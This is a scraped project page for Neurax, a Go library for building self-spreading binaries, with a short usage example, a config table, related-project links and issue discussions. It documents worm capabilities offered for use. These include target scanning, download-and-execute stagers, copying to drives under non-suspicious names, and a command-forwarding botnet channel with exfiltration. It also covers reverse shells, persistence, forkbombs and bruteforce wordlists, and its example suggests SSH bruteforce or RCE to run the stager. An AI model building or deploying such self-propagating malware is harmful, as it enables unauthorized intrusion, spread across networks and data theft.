A framework for constructing self-spreading binaries



A framework that aids in creation of self-spreading software


go get -u github.com/redcode-labs/Coldfire

go get -u github.com/yelinaung/go-haikunator

New in v. 2.0

  • New wordlist mutators + common passwords by country
  • Improvised passive scanning
  • .FastScan option that makes active scans a bit quicker
  • Wordlists are created strictly in-memory
  • NeuraxScan() accepts a callback function instead of channel as an argument.
  • NeuraxScan() scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets
  • Reverse-DNS lookup for targets that are not in IP format
  • Extraction of target candidates from ARP cache
  • Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)
  • Possibility to specify interface and timeout when using passive network scan.
  • Improved command stager (can be optionally executed with elevated privilleges / multiple times)
  • Few changes of options' names
  • NeuraxConfig. became N. (cause it's shorter to type)
  • Functions for random memory allocation + binary migration
  • Possibility to chain multiple stagers (ex. wget + curl)
  • Volume and complexity of created wordlist can be easily tuned (with options such as .WordlistExpand)
  • Possibility to set time-to-live of created binary


With help of Neurax, Golang binaries can spread on local network without using any external servers.

Diverse config options and command stagers allow rapid propagation across various wireless environments.

Example code

*/ } ">
package main
import . "github.com/redcode-labs/Neurax"

func main(){

  //Specify serving port and stager to use
  N.Port = 5555
  N.Stager = "wget"

  //Start a server that exposes the current binary in the background
  go NeuraxServer()
  //Copy current binary to all logical drives

  //Create a command stager that should be launched on target machine
  //It will download, decode and execute the binary
  cmd_stager := NeuraxStager()

  /* Now you have to somehow execute the command generated above.
     You can use SSH bruteforce, some RCE or whatever else you want ;> */


List of config entries

Name Description Default value
N.Stager Name of the command stager to use random, platform-compatible
N.StagerSudo If true, Linux cmd stagers are executed with elevated privilleges false
N.StagerRetry Number of times to re-execute the command stager 0
N.Port Port to serve on 6741
N.Platform Platform to target detected automatically
N.Path The path under which binary is saved on the host random
N.FileName Name under which downloaded binary should be served and then saved random
N.Base64 Encode the transferred binary in base64 false
N.CommPort Port that is used by binaries to communicate with each other 7777
N.CommProto Protocol for communication between nodes "udp"
N.ReverseListener Contains " : " of remote reverse shell handler not specified
N.ReverseProto Protocol to use for reverse connection "udp"
N.ScanRequiredPort NeuraxScan() treats host as active only when it has a specific port opened none
N.ScanPassive NeuraxScan() detects hosts using passive ARP traffic monitoring false
N.ScanPassiveTimeout NeuraxScan() monitors ARP layer this amount of seconds 50 seconds
N.ScanPassiveIface Interface to use when scanning passively default
N.ScanActiveTimeout NeuraxScan() sets this value as timeout for scanned port in each thread 2 seconds
N.ScanPassiveAll NeuraxScan() captures packets on all found devices false
N.ScanPassiveNoArp Passive scan doesn't set strict ARP capture filter false
N.ScanFirst A slice containing IP addresses to scan first []string{}
N.ScanFirstOnly NeuraxScan() scans only hosts specified within .ScanFirst false
N.ScanArpCache NeuraxScan() scans first the hosts found in local ARP cache. Works only with active scan false
N.ScanCidr NeuraxScan() scans this CIDR local IP + "\24"
N.ScanThreads Number of threads to use for NeuraxScan() 10
N.ScanFullRange NeuraxScan() scans all ports of target host to determine if it is active from 19 to 300
N.ScanInterval Time interval to sleep before scanning whole subnet again "2m"
N.ScanHostInterval Time interval to sleep before scanning next host in active mode "none"
N.ScanGatewayFirst Gateway is the first host scanned when active scan is used false
N.Verbose If true, all error messages are printed to STDOUT false
N.Remove When any errors occur, binary removes itself from the host false
N.PreventReexec If true, when any command matches with those that were already received before, it is not executed true
N.ExfilAddr Address to which output of command is sent when 'v' preamble is present. none
N.WordlistExpand NeuraxWordlist() performs non-standard transformations on input words false
N.WordlistCommon Prepend 20 most common passwords to wordlist false
N.WordlistCommonNum Number of common passwords to use all
N.WordlistCommonCountries A map[string]int that contains country codes and number of passwords to use map[string]int
N.WordlistMutators Mutators to use when .WordlistExpand is specified {"single_upper", "cyryllic", "encapsule"}
N.WordlistPermuteNum Maximum length of permutation generated by NeuraxWordlistPermute() 2
N.WordlistPermuteSeparator A separator character to use for permutations "-"
N.WordlistShuffle Shuffle generated wordlist before returning it false
N.AllocNum This entry defines how many times NeuraxAlloc() allocates random memory 5
N.Blacklist Slice that contains IP addresses that are excluded from any type of scanning []string{}
N.FastHTTP HTTP request in IsHostInfected() is performed using fasthttp library false
N.Debug Enable debug messages false

Finding new targets

Function NeuraxScan(func(string)) enables detection of active hosts on local network. It's only argument is a callback function that is called in background for every active host. Host is treated as active when it has at least 1 open port, is not already infected + fullfils conditions specified within N.

NeuraxScan() runs as infinite loop - it scans whole subnet specified by .Cidr config entry and when every host is scanned, function sleeps for an interval given in .ScanInterval.

Disks infection

Neurax binary doesn't have to copy itself using wireless means. Function NeuraxDisks() copies current binary (under non-suspicious name) to all logical drives that were found. Copied binary is not executed, but simply resides in it's destination waiting to be run. NeuraxDisks() returns an error if list of disks cannot be obtained or copying to any destination was impossible.

Another function, NeuraxZIP(num_files int) err allows to create a randomly named .zip archive containing current binary. It is saved in current directory, and contains up to num_files random files it.

NeuraxZIPSelf() simply zips the current binary, creating an archive holding the same name.

Synchronized command execution

Function NeuraxOpenComm() (launched as goroutine) allows binary to receive and execute commands. It listens on port number specified in .CommPort using protocol defined in .CommProto. Field .CommProto can be set either to "tcp" or "udp". Commands that are sent to the port used for communication are executed in a blind manner - their output isn't saved anywhere.

An optional preamble can be added before the command string.

Format: :

Example command with preamble might look like this: :ar echo "pwned"

Following characters can be specified inside preamble:

  • a - received command is forwarded to each infected node, but the node that first received the command will not execute it
  • x - received command will be executed even if a is specified
  • r - after receiving the command, binary removes itself from infected host and quits execution
  • k - keep preamble when sending command to other nodes
  • s - sleep random number of seconds between 1 and 5 before executing command
  • q - after command is executed, the machine reboots
  • o - command is sent to a single, random node. a must be specified
  • v - output of executed command is sent to an address specified under .ExfilAddr
  • m - mechanism that prevents re-execution of commands becomes disabled just for this specific command
  • l - command is executed in infinite loop
  • e - command is executed only if the node has elevated privilleges
  • p - command becomes persistent and is executed upon each startup
  • d - output of executed command is printed to STDOUT for debugging purpose
  • f - forkbomb is launched after command was executed
  • ! - if command was executed with errors and a is specified, this command is not forwarded

By default, raw command sent without any preambles is executed by a single node that the command was addressed for.

It is also important to note that when k is not present inside preamble, preamble is removed from command right after the first node receives it.

Example 1 - preamble is not forwarded to other nodes:

[InfectedHost1] (2) [InfectedHost1] "whoami" -----> [InfectedHostN] [InfectedHost1] removes itself after command was sent to all infected nodes in (2) because "r" was specified in preamble. "x" was not specified, so "whoami" was not executed by [InfectedHost1] ">
 (1) [TCP_client]    ":ar whoami" -----> [InfectedHost1] 
 (2) [InfectedHost1] "whoami"     -----> [InfectedHostN]
    [InfectedHost1] removes itself after command was sent to all infected nodes in (2)
     because "r" was specified in preamble. "x" was not specified, so "whoami" was not executed by [InfectedHost1] 

Example 2 - preamble is forwarded:

[InfectedHost1] (2) [InfectedHost1] ":akxr whoami" -----> [InfectedHostN] (n) [InfectedHostN] ":axkr whoami" -----> ............... ................................. -----> ............... Both [InfectedHost1] and [InfectedHostN] execute command and they try to send it to another nodes with preamble preserved ">
 (1) [TCP_client]    ":akxr whoami"  -----> [InfectedHost1] 
 (2) [InfectedHost1] ":akxr whoami"  -----> [InfectedHostN]
 (n) [InfectedHostN] ":axkr whoami"  -----> ...............
 .................................   -----> ...............

 Both [InfectedHost1] and [InfectedHostN] execute command and they try to send it to another nodes with preamble preserved

Reverse connections

An interactive reverse shell can be established with NeuraxReverse(). It will receive commands from hostname specified inside .ReverseListener in a form of " : " . Protocol that is used is defined under .ReverseProto If NeuraxOpenComm() was started before calling this function, each command will behave as described in above section. If it was not, commands will be executed locally.

Note: this function should be also runned as goroutine to prevent blocking caused by infinite loop used for receiving.

Cleaning up

Whenever "purge" command is received by a node, it resends this command to all other nodes, removes itself from host and quits. This behaviour can be also commenced using NeuraxPurge() executed somewhere in the source.

Wordlist creation

If spread vector of your choice is based on some kind of bruteforce, it is good to have a proper wordlist prepared. Storing words in a text-file on client side isn't really effective, so you can mutate a basic wordlist using NeuraxWordlist(...words) []string. To permute a set of given words, use NeuraxWordlistPermute(..words) []string

Setting time-to-live

If you want your binary to remove itself after given time, use NeuraxSetTTL() at the beginnig of your code. This function should be launched as a goroutine. For example:

go NeuraxSetTTL("2m")

will make the binary run NeuraxPurgeSelf() after 2 minutes from initial execution.

Using multiple stagers at once

If you would like to chain all stagers available for given platform, set .Stager to "chain".

Moving the dropped binary

If you need to copy the binary after initial execution, use NeuraxMigrate(path string). It will copy the binary under path, remove current binary and execute newly migrated one.

Support this tool

If you like this project and want to see it grow, please consider making a small donation :>

>>>>> DONATE <<<<<


This software is under MIT license

You might also like...
GoC2 - MacOS Post Exploitation C2 Framework
GoC2 - MacOS Post Exploitation C2 Framework

goc2 c2 client/server/paylod GoC2 - MacOS Post Exploitation C2 Framework Custom C2 for bypassing EDR and ease of use.

The High Code Framework (low-code for devs)

hof - the high code framework The hof tool tries to remove redundent development activities by using high level designs, code generation, and diff3 wh

A toaster component for hogosuru framework
A toaster component for hogosuru framework

Toaster component for hogosuru Toaster implementation for hogosuru How to use? Create a hogosurutoaster.Toaster or attach it to a hogosuru container a

Entitas-Go is a fast Entity Component System Framework (ECS) Go 1.17 port of Entitas v1.13.0 for C# and Unity.

Entitas-Go Entitas-GO is a fast Entity Component System Framework (ECS) Go 1.17 port of Entitas v1.13.0 for C# and Unity. Code Generator Install the l

Tanzu Framework provides a set of building blocks to build atop of the Tanzu platform and leverages Carvel packaging

Tanzu Framework provides a set of building blocks to build atop of the Tanzu platform and leverages Carvel packaging and plugins to provide users with a much stronger, more integrated experience than the loose coupling and stand-alone commands of the previous generation of tools.

An easy-to-use Map Reduce Go parallel-computing framework inspired by 2021 6.824 lab1. It supports multiple workers on a single machine right now.

MapReduce This is an easy-to-use Map Reduce Go framework inspired by 2021 6.824 lab1. Feature Multiple workers on single machine right now. Easy to pa

Extensions for the melatonin test framework

melatonin-ext - Extensions for the melatonin test framework These packages extend melatonin to provide additional test contexts for testing various 3r

Highly customizable archive and index framework for EPITA
Highly customizable archive and index framework for EPITA

epitar.gz Highly customizable archive and index framework for EPITA. Get started

Keyboard-firmware - Go Keyboard Firmware framework

Go Keyboard Firmware framework This is an experimental project that I am using t

  • goferish refactor and fixes

    goferish refactor and fixes

    Changes and fixes.

    • Introduce struct to be instantiated,
    • Add methods on pointer receiver,
    • Fix the number of slices allocations to the bare minimum,
    • Naming according to go standards,
    • Remove naming redundancy (neurax.NeuraxXXX -> neurax.XXX),
    • Introduce default config,
    • allow for context passing and safe server shutdown,
    • allow for safe goroutine closing (some of them, more goroutines needs a context for safe exit),
    • removed pythonic ideas (clunked the code unnecessarily), pythonic ideas work well for small prototype projects, not for reusable, well-performing, testable, and safe code.

    I would like to refactor more but not in one go.

    Please if there is anything that is somehow unclear I would be happy to clarify this. I think this library may have great potential but needs some architecture changes. This isn't easy when building things from scratch.

    opened by bartossh 2
  • Make it gopherish

    Make it gopherish

    Before starting with any new feature I would like to clear and reorganize the code a little bit, so it would be more GO like and less C/Python like. I don't want to impose my point of view or criticize as the whole idea and code looks handcrafted. This is well done but rather lacks gopher polish. I am afraid it can make adding new features hard and clunky. But with a few fixes, I think it can make it testable, organize it in a way that the package will depend on abstraction rather than on implementation. Then it will be able to decouple some parts and focus on improving performance if needed. The success of the package lies in how easy it feels for developers to write code without all the time referring to the documentation.

    I would propose to start from the simplest and then go for the hardest:

    • Make a feature branch so the above can be worked on independently not blocking any development.
    • Rewrite names (func, vars, definitions and docs) to be written according to GO standard.
    • Restructure code so public dependencies are well documented and depend on abstraction rather than on implementation so the package user may inject its own custom solution or we may provide more than one implementation available in easy to use way.
    • Write tests and benchmarks.
    • Each step will have a separate branch rooted from the feature branch.
    • Feature branch will be then merged to the main branch after the whole feature is accepted.


    This project is still in the early stage of development and has potential. After decoupling some logic we may know which part needs improvement. This will unlock more possibilities for the package user. This will allow creating smaller binaries as the package user will have more freedom in choosing what goes to the project she/he is working on.

    Please let me know if and how it is possible.

    Thanks. 👍 job.

    opened by bartossh 1
  • Feature ideas

    Feature ideas

    As already said in the other repository I'm very intrigued by your projects and adding Golang to my skillset now, after getting annoyed with Paramiko in Python. Did you limit the scanning feature on purpose on the /24 cidr or is a improvement to scan outside of the local network already in planning? Also I'm curious what you think about fileless self replicating code, only loaded and executed in RAM. Is that even possible with Go?

    opened by TormentedSoul666 3
Red Code Labs
Finest tooling for advanced adversarial simulations
Red Code Labs
Find strings in Go binaries

gostringsr2 gostringsr2 extracts strings from a Go binary using radare2. Tested with radare2 3.7.0, Python 3.7, r2pipe 1.4.1, on OS X and Linux. Teste

Carve Systems 46 Oct 20, 2022
Ghdl - A much more convenient way to download GitHub release binaries on the command line, works on Win & Unix-like systems

ghdl Memorize ghdl as github download ghdl is a fast and simple program (and als

beet 49 Oct 12, 2022
Embedded, self-hosted swagger-ui for go servers

swaggerui Embedded, self-hosted Swagger Ui for go servers This module provides swaggerui.Handler, which you can use to serve an embedded copy of Swagg

Andy Walker 54 Dec 31, 2022
Host yo' self from your browser, your phone, your toaster.

A hosting service from the browser, because why not. Try it at hostyoself.com. See it in action Here's an example where I use hostyoself.com to host i

Zack 1.7k Jan 1, 2023
Enable your Golang applications to self update with S3

s3update Enable your Golang applications to self update with S3. Requires Go 1.8+ This package enables our internal tools to be updated when new commi

Heetch 103 Jul 20, 2022
Universal code search (self-hosted)

Sourcegraph OSS edition is a fast, open-source, fully-featured code search and navigation engine. Enterprise editions are available. Features Fast glo

Sourcegraph 7.2k Jan 9, 2023
Self hosted search engine for data leaks and password dumps

Self hosted search engine for data leaks and password dumps. Upload and parse multiple files, then quickly search through all stored items with the power of Elasticsearch.

Davide Pataracchia 22 Aug 2, 2021
Listmonk - a standalone, self-hosted, newsletter and mailing list manager

listmonk is a standalone, self-hosted, newsletter and mailing list manager. It is fast, feature-rich, and packed into a single binary. It uses a Postg

null 0 Jan 13, 2022
Antch, a fast, powerful and extensible web crawling & scraping framework for Go

Antch Antch, inspired by Scrapy. If you're familiar with scrapy, you can quickly get started. Antch is a fast, powerful and extensible web crawling &

null 243 Jan 6, 2023
F' - A flight software and embedded systems framework

F´ (F Prime) is a component-driven framework that enables rapid development and deployment of spaceflight and other embedded software applications.

NASA 9.2k Jan 4, 2023